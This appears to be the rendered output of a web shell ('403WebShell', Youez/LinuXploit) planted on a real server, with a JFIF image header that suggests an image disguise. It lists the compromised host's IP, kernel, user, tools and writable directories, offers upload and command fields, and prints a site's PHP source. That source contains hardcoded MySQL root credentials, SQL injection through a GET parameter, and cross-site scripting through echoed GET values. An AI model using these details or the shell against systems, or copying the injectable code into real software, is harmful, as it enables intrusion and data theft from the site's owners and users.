????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.142.97.186
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/message_center/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/icad.astacus.se/message_center/index.php
<?php

	$ProjectId = $_GET['projectid'];
	$Key = $_GET['key'];

	
	$md5 = md5($ProjectId."qwedwefeqfq23423rd");
	

	if($md5 == $Key)
	{
		$link = mysql_connect ("localhost", "root", "root123");
		mysql_select_db ("vpa");
		 $sql = "SELECT * FROM ProjectLog WHERE SystemUserId = ".$_GET['SystemUserId']." order by LogDate desc Limit 1";

		 $result = mysql_query($sql);
		  
		  while ($row = mysql_fetch_assoc($result)){ 
			$message =  $row['Message'];
	
		  }

	}
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.style6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 24px; }
-->
</style>



</head>

<body>

<script type="text/javascript" src="http://www.google.com/jsapi">
</script>

<script type="text/javascript">
<!--
google.load("language", "1");
var s;
    function initialize() {
      var text = document.getElementById("text").value;
      google.language.detect(text, function(result) {
        if (!result.error && result.language) {
          google.language.translate(text, result.language, "en",
                                    function(result) {
            var translated = document.getElementById("translation");
            if (result.translation) {
              translated.value = result.translation;
            }
          });
        }
      });
	  s=setTimeout("initialize()",1000);

    }
    google.setOnLoadCallback(initialize);

//-->
</script>

<form name="form1" method="post" action="addmessage.php">
  <table width="306" border="0" align="center" cellpadding="0" cellspacing="0" class="style6">
    <tr>
      <td><div align="left"><strong>        Svara p&aring; meddelandet: </strong><span class="text"><span class="heading2">
        <br>
        <?php echo($message);?><br>
        <br>
        <input type="hidden" name="ProjectId" value="<?php echo($_GET['projectid']);?>">
        <input type="hidden" name="SystemUserId" value="<?php echo($_GET['SystemUserId']);?>">
        <input type="hidden" name="Key" value="<?php echo($_GET['key']);?>">

        <br>
      </span></span> </div></td>
    </tr>
    <tr>
      <td><div align="right"><br>
        Skriv p&aring; svenska eller engelska: <br>
        <textarea name="text" cols="45" rows="5" class="style6" id="textarea"></textarea>
        Engelsk &ouml;vers&auml;ttning:<br>
        <textarea name="translation" cols="45" rows="5" class="style6" id="translation" readonly></textarea>
        <input name="Submit" type="submit" class="style6" value="Spara">
      </div></td>
    </tr>
  </table>
</form>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit